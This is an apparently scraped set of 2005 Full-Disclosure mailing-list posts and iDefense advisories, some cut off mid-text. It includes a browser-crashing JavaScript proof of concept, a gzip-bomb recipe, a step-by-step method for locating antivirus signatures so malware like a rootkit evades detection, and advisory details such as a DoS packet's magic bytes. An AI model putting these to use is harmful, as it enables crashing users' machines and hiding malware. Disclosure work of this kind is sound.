from:"\[EMAIL PROTECTED\]"

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

have 2,5Gb DDR2 ram and nothing happen here, it loads during 1 min, then
all is fine.. I guess the sploit coder had 64 Mb edo :D :D

Fósforo wrote:
> It works here.
> 
> seems it depends on how much ram you've. i got 2 blue screens, after
> changed the code a bit. the first one was about MEMORY_MANAGEMENT and
> the second one was a PAGE_FAULT_IN_NONPAGED_AREA. And both occurs
> without user interaction, the second one i just've opened firefox, not
> the bug file (maybe cache ?)
> 
> ps: i've 1Gb of ram
> 
> heh
> function ex() {
>var buffer = "";
>for (var i = 0; i < 5000; i++) {
>buffer += "A";
>}
>var buffer2 = buffer;
>var buffer3 = buffer2;
>for (i = 0; i < 500; i++) {
>buffer2 += buffer;
>for (i = 0; i < 500; i++) {
> buffer3 += buffer2;
>    }
>}
>document.title = buffer2;
> }
> ZIPLOCK says CLICK ME
> 
> 
> 
> 
> 2006/1/31, ezdy <[EMAIL PROTECTED]>:
> 
>>and theres no reason for it to be working.
>>first let's see what's going on - i loaded provided html in firefox
>>and quitted it.
>>even quitting firefox took a while, but only slightly longer than usual.
>>after starting firefox again, it indeed didn't load, stuck in some
>>kind of disk loop ignoring all macosx ui events.
>>but not swapping. alright, that's strange:
>>
>>[EMAIL PROTECTED]:~/Desktop/Firefox.app/Contents/MacOS$ ktrace ./firefox-
>>bin
>>[EMAIL PROTECTED]:~/Desktop/Firefox.app/Contents/MacOS$ kdump -m 1 |
>>tail -100
>>...
>>  7616 firefox-bin CALL  read(0x18,0xcad9e00,0x1000)
>>  7616 firefox-bin GIO   fd 24 read 4096 bytes
>>   "0"
>>  7616 firefox-bin RET   read 4096/0x1000
>>  7616 firefox-bin CALL  read(0x18,0xcad9e00,0x1000)
>>  7616 firefox-bin GIO   fd 24 read 4096 bytes
>>   "0"
>>  7616 firefox-bin RET   read 4096/0x1000
>>  7616 firefox-bin CALL  lseek(0x18,0x21a000,0)
>>  7616 firefox-bin RET   lseek 0
>>  7616 firefox-bin CALL  read(0x18,0xcad9e00,0x1000)
>>  7616 firefox-bin GIO   fd 24 read 4096 bytes
>>   "0"
>>  7616 firefox-bin RET   read 4096/0x1000
>>  7616 firefox-bin CALL  read(0x18,0xcad9e00,0x1000)
>>  7616 firefox-bin GIO   fd 24 read 4096 bytes
>>   "\\"
>>  7616 firefox-bin RET   read 4096/0x1000
>>  7616 firefox-bin CALL  lseek(0x18,0x21c000,0)
>>  7616 firefox-bin RET   lseek 0
>>  7616 firefox-bin CALL  read(0x18,0xcad9e00,0x1000)
>>  7616 firefox-bin GIO   fd 24 read 4096 bytes
>>   "A"
>>  7616 firefox-bin RET   read 4096/0x1000
>>  7616 firefox-bin CALL  read(0x18,0xcad9e00,0x1000)
>>  7616 firefox-bin GIO   fd 24 read 4096 bytes
>>   "A"
>>  7616 firefox-bin RET   read 4096/0x1000
>>  7616 firefox-bin CALL  lseek(0x18,0x21e000,0)
>>  7616 firefox-bin RET   lseek 0
>>  7616 firefox-bin CALL  read(0x18,0xcad9e00,0x1000)
>>
>>this repeats virtually ad-infinitum until end of history.dat is reached.
>>note that there is never allocated any memory-the same buffer is
>>always used, thus no memory leak.
>>firefox is stuck in loop (and eventually starts, since the string is
>>finite, in my case
>>about 30M) but it took way too longer to load. im not a windows user
>>but since mac is only
>>step away from it (you know apple, let's take win95 and freebsd and
>>mix it together) my guess is
>>it is the same situation of keeping main thread busy and events
>>cannot be passed down, eventualy
>>leading to "application is not responding" killbox.
>>
>>for Z1PL0CK:
>>Don't stop, keep posting fake "buffer overflows" of #darknet
>>trademonkeys (this one actually looked funny in the beggining).
>>This time you made it to get /.ed which is not a bad start, but yo
>>gonna fly higher!
>>
>>Because this bug got killed, i've something better for you:
>>dd if=/dev/zero a 2GB file and gzip it. then just write a php script
>>which sets content-encoding: gzip and
>>fpassthru the file. safari rendered 1.2gb system unresponsible in 5
>>seconds, firefox in about 30. both crashed
>>on "overflows" like this:
>>
>>Safari(233,0xa000ed68) malloc: *** vm_allocate(size=125896)
>>failed (error code=3)
>>Safari(233,0xa000ed68) malloc: *** error: can't allocate region
>>Safari(233,0xa000ed68) malloc: ***

Re: [Full-disclosure] Standalone PC Lockdown

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

I think deep freeze is a good reference, a lot used in government/schools.

http://www.faronics.com/index.asp

Jesse Valentin wrote:
> Hello everyone,
>  
> Wanted to find out if anyone knew of a PC Lockdown program that could be
> used on a standalone machine? I'm planning to setup a machine running
> Windows XP Pro for a friend that wants to allow different people to use
> a machine for research purposes.
>  
> This machine is a standalone and I want to restrict certain programs and
> options on the Start menu from everyone except Admins. So far I've
> played with the services on the box, but any change I make to a service
> affects every user on the box. I really want to enforce software
> restrictions as well as operating system restrictions on the box but not
> sure how to do this without impacting the other users on the system.
>  
> Anyone know of any program that locks down the PC similar to what a bank
> does or machines that are used at kiosks in tradeshows?
>  
> Any suggestions would be appreciated.
>  
> Thanks -
>  
> JV
> 
> 
> -
> This e-mail and any attachments may be confidential or legally
> privileged. If you received this message in error or are not the
> intended recipient, you should destroy the e-mail message and any
> attachments or copies, and you are prohibited from retaining,
> distributing disclosing or using any information contained herein.
> Please inform the sender of the erroneous delivery by return e-mail.
> Thank you for your cooperation.
> -
> 
> 
> Yahoo! Shopping
> Find Great Deals on Holiday Gifts at Yahoo! Shopping
> >
> 
> 
> 
> 
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.2 (MingW32)

iQIVAwUBQ5slZK+LRXunxpxfAQKQ9RAAg4nLPb9zpK55CYGV3jSF5DvDJ71cwUy8
YlAm5QZDAiFWbNrgZofdnDC1ij7ascgCxEFySIktaJhKjf4YHZ6HjllhyO0yuXaz
alD5IaXh9WXKR0ZDZEqvdISFemdjgg81cSGPU4tDuTXF8FDAJWEPaDANTe204kea
i2d2Z0Y6LHPKCUrq5GUIR19msiy6fADmgDgogRmwiD2vdKusWehDxD71t2JeE/Zs
Hb+AyvRHeUdP51W8jla0guwqxkCF/1+7zRHN9XhYBaAib27v0np2EoszFHsMJdrU
ZQqOGQmXr7PBGxgJN/irl2cAr2Sxwowub0YdxhunDzkhHVanx+oCGnZGfCquL/Z/
PW4S5XINxaGiMo8Cv7/MRsKYFhcp3dwaaMU0lzTrVPR9u7tMg/hsRsNAuLN2B/RQ
HC8ZyKiDJieWBe3ehKe1ziDRYHWR5H4qeBKA+X3JB5Mj4EzLpwKPVo/nsPhk+MdK
zRUmEu4f05MQEHQNjZ+OJmNo/sZ9brvy/2hFjUCbJUXoyXUfkwsFZAwb/PMynhk1
sRelKrWMDV78E36cUUc4QWkuD1Lf6ww/qzhP0SqljDT61lHhzJ92shceEuIcL9UA
drMvQoeKDaU87whbWAV9PPXs2jKK4qT9GsiZewpFLG/ggFnX0PlDXn6GOu2LSgJB
D6QjKO2J8z8=
=kQl9
-END PGP SIGNATURE-
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Standalone PC Lockdown

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

deep freeze isn't really something you can reproduce with your hands
like you say , it's much another security prevention in addition of your
registry things, which will restore your computer at every restart as
you configured it, this is like an ultimate prevention wich most hackers
can't defeat, believe me :)


InfoSecBOFH wrote:
> You can in fact do everything that the software packages do yourself
> via registry keys and the local security policy.  Its a lot more work
> but would also save you a couple bucks.
> 
> Personally, I dont like paying for something I can just as easily do myself.
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
> 
> 
> .
> 

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.2 (MingW32)

iQIVAwUBQ5sq+6+LRXunxpxfAQIFNg/9EEIKLhCzaOlcLvzYs5AtDPGilK4T9Lc/
Xon4M0NG3vA7R8xqiy/6QEjeqJlVXT8DKkObjNgaF8nWa2FW4hcaF4ZHU3TAqKEF
pZa67D/WekTWKqC4LndZb+t5SNgyx9TNW/jtPHqtBOU5FukCKcR4Boy1AodUZh00
P65QmAVaxPkr0VIZbNE1VI4nWYiWSocjATgYgXXYTsQwNKbZhHvISn+Gd30VtRD9
YhHIu5J9IpUznEUXmoPyibGrXO1LgxNN28bx+zxkJB4roBRRvzGZ5yBkLcDVD3FD
Qthe20nkwSny79wRnoPnmyR1D3NfNzFom03rvgK90kQUSzl/rWUpGtxDQUtd+Dp0
tPvUxQSe17EvLmzIs5JbsL5mU2lRICABd4Yr6FV53r9JMn5vFmLoSeTUrS5zJ5+F
v+sZpkKf4VxFlqpY+cudIWx5IRVCgycnDduV3P4L83KcU5xCeNlRWCDUTVLGTuIO
D9tFMpaimyt8t6Ux5kzltH/5/PCeb03ZarhOD0wnQeIt/1uG0eN25BPJaIFudVc2
+JwUMIp2dKhb4ZATfo9tN37KWpm+3AiP/S6+FChol18FnmWsEyjf0HRrhpx7cr8e
tDZsJ8niVi89X7rI2qkJp2BpP1pcfcfg3BnpU4M4UIEXaRF4RJpbUERpIJZ9BvoW
2KaRVNXUdMM=
=ESsu
-END PGP SIGNATURE-
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] 0-day for sale on ebay

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

here is a possible debug screenshot of the bug

http://heapoverflow.com/excel-hot.jpg

I say "possible" and I hide debug infos because I'm not sure if my
discovery is the same auctionned on ebay, it does at least some leet
flame ;>

Joel R. Helgeson wrote:
> Here's a full screen capture for those who missed it.
>  
> Joel
> 
> - Original Message -
> *From:* tmz99ar <mailto:[EMAIL PROTECTED]>
> *To:* full-disclosure@lists.grok.org.uk
> <mailto:full-disclosure@lists.grok.org.uk>
> *Sent:* Thursday, December 08, 2005 1:22 PM
> *Subject:* [Full-disclosure] 0-day for sale on ebay
> 
> http://cgi.ebay.com/ws/eBayISAPI.dll?ViewItem&item=7203336538
> <http://cgi.ebay.com/ws/eBayISAPI.dll?ViewItem&item=7203336538>
> -
> MailFreeOnline.com <http://www.MailFreeOnline.com/>, your solution
> to be anonymous!
> 
> 
> 
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
> 
> 
> 
> 
> 
> 
> 
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.2 (MingW32)

iQIVAwUBQ5uvBK+LRXunxpxfAQJewBAA3ACP/I7XsC7GIrmadivLVP/UJVVABV66
B2/0Gjdnxt2WYLJY8PLrMeK9EIQjIpcE0//auqC3vhbD3qf+DKFENBYFGSp4Rc+q
out3gusTzjgjaE+VZEFCbP3AuQ0kCa2khWaO7raKa32Sp/mmekeq/IBIE69OHbYx
E7cR6IsaCEo4Qc2hi5pL1LAg+TRnfxBDB9UB6T/ntFjYxbdBovVXOLugFZFml2r1
ubeZkeBvzg9f10Hi07kKlaJekUy2gwUan2HJFsVUUQ7QLKrafZ6y4E+EtOPTxL0Z
4KhzQ/Xj/lx0w8fL0O3uZknREEneTRRbiJ8kR3h26VWHhs6G3eQdZ/mHs5Rn1SuT
OKVT/iYrOQHsB/edA4mKz79wNLi/waZAVhORnBh0qvvzodZZO3i2vzEVC6pWcNjc
Ludy1ka9BkuqPcI6+P4tvv4zPl8oGfGKFCF4AcB//6Vo7rDtODsSXeDqIOLMkEX2
f71795zSGe/c6CetCXsclkoedGK2CZLDbHZbDUoDw8sCTiZvKurhTogLddiR1tjr
mCS7GqUJ7EQ9h9JXObu6x2xp0b3i9cfb7PHXQAOkdj7ARB+OnAuko9ufqhdRx+Nv
3ZJ0KaAqXTR8rJdrwLZJnwFqqLLCbyL7dJDVhnBJbg8MNWJCCv+kAA4nwOrLAO1v
LLt4BFWYMk4=
=smNk
-END PGP SIGNATURE-
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] McAfee VirusScan vs Metasploit Framework v2.x

2005-12-11 Thread [EMAIL PROTECTED]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

I think most AV today detects any tool wich can also been used by script
kiddies remotely, mine dfind is also detected by a lot (to note the
award winning pestpatrol's detection wich find it with the md5 checksum
huhu)

Pavel Kankovsky wrote:
> On Sat, 10 Dec 2005, Debasis Mohanty wrote:
> 
> 
From: H D Moore
Looks like some overzealous idiot at McAfee added "Trojan" signatures for
202 files in the latest version of the Metasploit Framework.
>>
>>Just for the info, they have also added Nmap as "potentially unwanted
>>application" (http://vil.mcafeesecurity.com/vil/content/v_100955.htm) 
> 
> [...]
> 
> Are we making a list?
> You can add Symantec reporting a copy of Netcat as a "hacking tool".
> 
> --Pavel Kankovsky aka Peak  [ Boycott Microsoft--http://www.vcnet.com/bms ]
> "Resistance is futile. Open your source code and prepare for assimilation."
> 
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
> 
> 
> 

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.2 (MingW32)

iQIVAwUBQ5xL96+LRXunxpxfAQKyGRAAgXaq9ypqVE8swO0xzNo01Txcqj8YWhdd
Sqt9/fm5sxZqaYUIUZq70/QaFwFilis8VG6XQGrVy7Wkg7XzEsV4ioslMKDjvfAL
mSA6ynrHAXDvWpzDbnZL1T/j7Q2H8cls3Vof2VhV5RH6Pc0Q0IJZAY1bp1JosiwN
nRXv7ForOeYZaVAkK0Xf6HZVw33VVLXQ3HXTtd+6Kc1/uW+HIaAXLmQJ00KOysxq
vu6DgDYJO0xjgKwSxv5MtDbffIFOjiE3IR8KJREx94ckSvRyY7yLwqct6pxdRX3i
Rcsy/xN2gHm0EI7eR7yTKPKuswzPrj61W6iKTDpGCHC2a4PUdJ668y71tH2tWu5U
Q7R1ewPCZLKp1b3mLMvp4kZvGrwWbMUoyqqmzg+UxaPBFtT4ioniQKeLd1JusjDU
RGB4WW8QSpfeygH7u/2JJmiP8CkVvlC5PbPvvoAkUKMwF+Gt+noVSIoPL5FxALso
TmWLTIBcVZRi9CiFe0CRruTHbOLZHFFlnzcNKDOkrBEXfxokYbcWlpY+M5532mEh
78CVHOgxsAmHRIird42qoHmPD7jnYeiZnsG5lSPUNfvCeydUPglwLa5bPTFXVjIh
0iuVwXTnDjjGRZ5Ba+MqSc0nka0MYdnrLIbhPjW8M88T05J5UKANH6kpzWYFcbsz
J083l+uNXBg=
=KP8q
-END PGP SIGNATURE-
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] iDEFENSE Security Advisory 12.12.05: SCO Unixware Setuid 'uidadmin' Scheme Buffer Overflow Vulnerability

2005-12-12 Thread [EMAIL PROTECTED]


SCO Unixware Setuid 'uidadmin' Scheme Buffer Overflow Vulnerability

iDefense Security Advisory 12.12.05

www.iDefense.com/application/poi/display?id=350&type=vulnerabilities
December 12, 2005

I. BACKGROUND

SCO Unixware is a Unix operating system that runs on many OEM platforms.

II. DESCRIPTION

Local exploitation of a buffer overflow vulnerability in the uidadmin
binary included in multiple versions of The SCO Group Inc.'s Unixware
allows attackers to gain root privileges.

The vulnerability specifically exists because of a failure to check the
length of user specified file input. If the user prepares a file longer
than 1,600 bytes and supplies the path to that file using the "-S"
option of uidadmin, a stack based buffer overflow occurs. This leads to
the execution of arbitrary code with root privileges, as uidadmin is
setuid root by default.

III. ANALYSIS

Successful exploitation of this vulnerability requires that a user have
local access to the system. This would allow the user to gain super user
privileges.

IV. DETECTION

iDefense has confirmed the existence of this vulnerability in SCO
Unixware versions 7.1.3 and 7.1.4. All previous versions of SCO Unixware
are  suspected to be vulnerable.

V. WORKAROUND

Remove the setuid bit from the ppp binary:

 chmod u-s /unixware/usr/bin/uidadmin

VI. VENDOR RESPONSE

The vendor has released the following update to address this
vulnerability:

 ftp://ftp.sco.com/pub/updates/UnixWare/SCOSA-2005.54

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2005-3903 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

10/12/2005  Initial vendor notification
10/13/2005  Initial vendor response
12/12/2005  Coordinated public disclosure

IX. CREDIT

iDefense Labs is credited with the discovery of this vulnerability.

Get paid for vulnerability research
http://www.iDefense.com/poi/teams/vcp.jsp

Free tools, research and upcoming events
http://labs.iDefense.com

X. LEGAL NOTICES

Copyright © 2005 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically, please
email [EMAIL PROTECTED] for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Inside AV engines?

2005-12-12 Thread [EMAIL PROTECTED]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

I would like to have much time to explain you clearly how to but sorry I
will do quick cos I disconnect soon:

what do you need to do on the infected file is to split it in different
part with the same size, then you sort out the infected part and the one
not. you re-split those files again but in smaller size, you sort out
again the infected one and the one not , etc , you will find out quickly
the detected signature with a byte precision.

tip: a tool outta there does it really well , its name UKSpliter, its
place, google :)

nb: this method is useless when the av detects a MD5 checksum as
pestpatrol, you change any byte and this is no more detected then...

This is the ultimate way to trick all antivirus , in the old days , had
made the famous rootkit hackerdefender undetected by all of them, to
note sophos and kav harder to trick because they detects signatures ,
wich modded, will probably break your proggie..

cheers to undergroundkonnekt guys :)

Jeroen wrote:
> For penetration testing on Wintel system, I often use netcat.exe and stuff
> like pwdump. More and more I need to disable anti-virus services before
> running the tools to avoid alarms and auto-deletion of the applications. It
> works but it isn't an ideal situation since theoretically a network can be
> infected while the AV-services are down. Recompiling tools is an option
> since the source of many tools I use is available. The question is (before I
> burn useless CPU cycles): can someone help me getting info about the inside
> of AV engines? Will addition of some rubbish to the code do the trick (->
> other checksum), do I need to change some core code or is it a mission
> impossible anyway? Who can help for example getting some useful research
> papers on the subject of detecting viruses and how to bypass mechanisms
> used? Any help will be appreciated.
> 
> 
> Greets,
> 
> Jeroen
> 
> 
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
> 
> 
> 

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.2 (MingW32)

iQIVAwUBQ54E86+LRXunxpxfAQLAww//Zush1/OE+akYbRfK8DS5l+QVSmQxcAMu
+itH0H5uNAR83/EWmzVxSK75j6qKqs7EiqL8TcDhXfEU6hwBN+IXz827kaa/ZOhX
N5yE17fSxTWuWI7G7MkHmiZv9gdk2M0ior+uf8HCXGZ4s+giDJNffsoBBSKtE6x+
7kreEuDS2g6jiyx7Qv0phoX/GrlTClrCEzcApOO10sq6ItD0HQGFG3c+2OuIQkQz
WS4A7TIwj6/XUiPs7uy32chUaoFNdf0sgMAP2Vbj1LClOk2pWfwHG33JrCHb0cg+
so6oYxHZpkN1Lsnr5mDgDZ55589VHihvl94Y8EDTt03J6E7OQ2qJX5uwdKB/8iVs
086Ak+1uXYf8PKD6SnAdurOfP9eQpUD7zIs8bXDE74vmjJt5oc++W5RMf+a40+Cj
RukAi2OME39bi3jLaNg/r5g6D0sKQ9uhx45S3h5ziyPGswK6iFQoTfnyb3gRyhs9
5f7CWKjaEihI4qn1R+WkYq7wpsPjnufCtjOZfvuFhi2bFiwnPkbkrTckle4+QGXF
dVrv8ki5sYxC3qgPcKGOjgKXeQ2vLA6vrxpRo/lMJp3RqGv4nEpQXCza2jx8scrs
2IkjJskzmC8sBaSCJ6xgMeQjAjqI8lVClIbPmAQYOaX8owLZ9IZsqiPE/g+sFDu+
h1d0xyOwpH4=
=xowQ
-END PGP SIGNATURE-
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] iDefense Security Advisory 12.14.05: Trend Micro PC-Cillin Internet Security Insecure File Permission Vulnerability



Trend Micro PC-Cillin Internet Security Insecure File Permission 
Vulnerability


iDefense Security Advisory 12.14.05
www.idefense.com/application/poi/display?id=351&type=vulnerabilities
December 14, 2005

I. BACKGROUND

Trend Micro PC-Cillin Internet Security is antivirus protection software
for home and business use. It provides complete protection, detection
and elimination of thousands of computer viruses, worms, and Trojan
Horse programs.

II. DESCRIPTION

Local exploitation of an insecure permission vulnerability in multiple
Trend Micro Inc. products allows attackers to escalate privileges or
disable protection.

The vulnerabilities specifically exist in the default Access Control
List (ACL) settings that are applied during installation. When an
administrator installs an affected Trend Micro product, the default ACL
allows any user to modify the installed files. Due to the fact that some
of the programs run as system services, a user could replace an
installed Trend Micro product file with their own malicious code, and
the code would be executed with system privileges.

III. ANALYSIS

Successful exploitation allows local attackers to escalate privileges to
the system level. It is also possible to use this vulnerability to
simply disable protection by moving all of the executable files so that
they cannot start upon a reboot. Once disabled, the products are no
longer able to provide threat mitigation, thus opening the machine up to
attack.

IV. DETECTION

iDefense has confirmed the existence of this vulnerability in Trend
Micro PC-Cillin Internet Security 2005 version 12.00 build 1244. It is
suspected that previous versions are also vulnerable. It has been
reported that InterScan VirusWall, InterScan eManager and Office Scan
are also vulnerable.

V. WORKAROUND

Apply proper Access Control List settings to the directory that the
affected Trend Micro product is installed in. The ACL rules be set so
that no regular users can modify files in the directory.

VI. VENDOR RESPONSE

"Trend Micro has become aware of a vulnerability related to PC-CILLIN
12. PC-cillin12 does not work correctly when configuration file and the
registry are erased intentionally.

We will release PC-cillin12.4 in December 14, 2005 by AU server. This
release will be included short term solution of changing ACL to User
authority for configuration file and registry.

And

We will create a tool for changing ACL to User authority for
configuration file and registry.

This tool can be used for both PC-cillin12 and PC-cillin14 as a same
program."

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2005-3360 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

10/27/2005 Initial vendor notification
10/27/2005 Initial vendor response
12/14/2005 Public disclosure

IX. CREDIT

The discoverer of this vulnerability wishes to remain anonymous.

Get paid for vulnerability research
http://www.iDefense.com/poi/teams/vcp.jsp

X. LEGAL NOTICES

Copyright © 2005 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically, please
email [EMAIL PROTECTED] for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] iDefense Security Advisory 12.14.05: Trend Micro ServerProtect Crystal Reports ReportServer File Disclosure



Trend Micro ServerProtect Crystal Reports ReportServer File Disclosure

iDefense Security Advisory 12.14.05
www.idefense.com/application/poi/display?id=352&type=vulnerabilities
December 14, 2005

I. BACKGROUND

Trend Micro Inc.'s ServerProtect provides antivirus scanning with
centralized management of virus outbreaks, scanning, patter file
updates, notifications and remote installations. More information about
the product set is available at:

www.trendmicro.com/en/products/file-server/sp/evaluate/overview.htm

II. DESCRIPTION

Remote exploitation of an input validation vulnerability in Trend Micro
Inc.'s ServerProtect Management Console allows remote attackers to view
the contents of arbitrary files on the underlying system.

The problem specifically exists within the handling of the IMAGE
parameter in the script rptserver.asp. The vulnerable area of code is
outlined in the following snippet:

Set session("oEMF") = Server.CreateObject("CREmfgen.CREmfgen.2")
Call ParseQS()
if IMAGE <> "" then
 Call session("oEMF").StreamImage(IMAGE, DEL)
 Response.End
end if

An attacker can utilize directory traversal modifiers to traverse
outside the system temporary directory and access any file on the same
volume.

III. ANALYSIS

Successful exploitation of the described vulnerability allows remote
attackers to view the contents of arbitrary files on the underlying
system. Exploitation does not require credentials thereby exacerbating
the impact of this vulnerability.

IV. DETECTION

iDefense has confirmed the existence of this vulnerability in Trend
Micro ServerProtect for Windows Management Console 5.58 running with
Trend Micro Control Manager 2.5/3.0 and Trend Micro Damage Cleanup
Server 1.1. It is suspected that earlier versions and versions for other
platforms are vulnerable as well.

V. WORKAROUND

Employ firewalls, access control lists or other TCP/UDP restriction
mechanism to limit access to the vulnerable system on the configured
port, generally TCP port 80.

VI. VENDOR RESPONSE

"Trend Micro has become aware of a vulnerability related to Crystal
Report, a reporting component found in Trend Micro Control Manager (v2.5
and v3.0). Under certain conditions, arbitrary files on the
ReportServer volume inside Trend Micro Control Manager software could be
viewed or accessed remotely. Trend Micro is currently consulting with
Crystal Report regarding permanent solutions to this reporting
component. A temporary workaround solution can be recommended through
contacting Trend Micro customer and technical support."

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2005-1930 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

06/03/2005 Initial vendor notification
06/06/2005 Initial vendor response
12/14/2005 Public disclosure

IX. CREDIT

The discoverer of this vulnerability wishes to remain anonymous.

Get paid for vulnerability research
http://www.iDefense.com/poi/teams/vcp.jsp

Free tools, research and upcoming events
http://labs.iDefense.com

X. LEGAL NOTICES

Copyright © 2005 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically, please
email [EMAIL PROTECTED] for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] iDefense Security Advisory 12.14.05: Trend Micro ServerProtect isaNVWRequest.dll Chunked Overflow

granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically, please
email [EMAIL PROTECTED] for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] iDefense Security Advisory 12.14.05: Trend Micro ServerProtect relay.dll Chunked Overflow Vulnerability

 of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically, please
email [EMAIL PROTECTED] for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] iDefense Security Advisory 12.14.05: Trend Micro ServerProtect EarthAgent Remote DoS Vulnerability


Trend Micro ServerProtect EarthAgent Remote DoS Vulnerability

iDefense Security Advisory 12.14.05
www.idefense.com/application/poi/display?id=356&type=vulnerabilities
December 14, 2005

I. BACKGROUND

Trend Micro Inc.'s ServerProtect provides antivirus scanning with
centralized management of virus outbreaks, scanning, patter file
updates, notifications and remote installations. More information about
the product set is available at:

www.trendmicro.com/en/products/file-server/sp/evaluate/overview.htm

II. DESCRIPTION

Remote exploitation of a denial of service vulnerability in Trend Micro
Inc.'s ServerProtect EarthAgent daemon allow attackers to cause the
target process to consume 100% of available CPU resources.

The problem specifically exists within ServerProtect EarthAgent in the
handling of maliciously crafted packets transmitted with the magic value
"\x21\x43\x65\x87" targeting TCP port 5005. A memory leak also occurs
with each received exploit packet allowing an attacker to exhaust all
available memory resources with repeated attack.

III. ANALYSIS

Successful exploitation of the described vulnerability allows
unauthenticated remote attackers to consume 100% CPU resources,
increasingly consume memory resources and potentially crash the
underlying operating system. Full CPU utilization can be achieved with a
single packet, memory consumption occurs incrementally on subsequent
attacks.

IV. DETECTION

iDefense has confirmed the existence of this vulnerability in Trend
Micro ServerProtect for Windows Management Console 5.58 running with
Trend Micro Control Manager 2.5/3.0 and Trend Micro Damage Cleanup
